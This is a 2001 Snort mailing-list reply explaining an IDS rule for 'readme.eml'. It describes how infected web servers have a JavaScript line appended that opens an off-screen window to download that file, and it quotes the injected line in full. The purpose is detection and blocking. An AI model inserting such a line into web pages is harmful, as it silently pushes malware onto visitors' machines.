Snort mailing list archives

Re: uricontent misbehaving?

From: Tim Kramer <kramert () mlrnoc navy mil>
Date: 02 Nov 2001 22:07:55 -0500

Dan,

The "readme.eml" rule (in this case) was probably written
that they have an extra line of HMTL/JavaScript code at the
bottom of the web page.  The additional code causes a new
browser window to be opened will off the visible portion of
the desktop (location 6000,6000) and to download a file
called "readme.eml".  The actual code that gets added to the
webpage looks like (without the proper JavaScript tags):

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

The act of visiting the infected website causes an additional
HTTP request.  This also makes it easy to detect (via Snort)
and/or easy to  block (via Squid).

Hope this helps,
Tim Kramer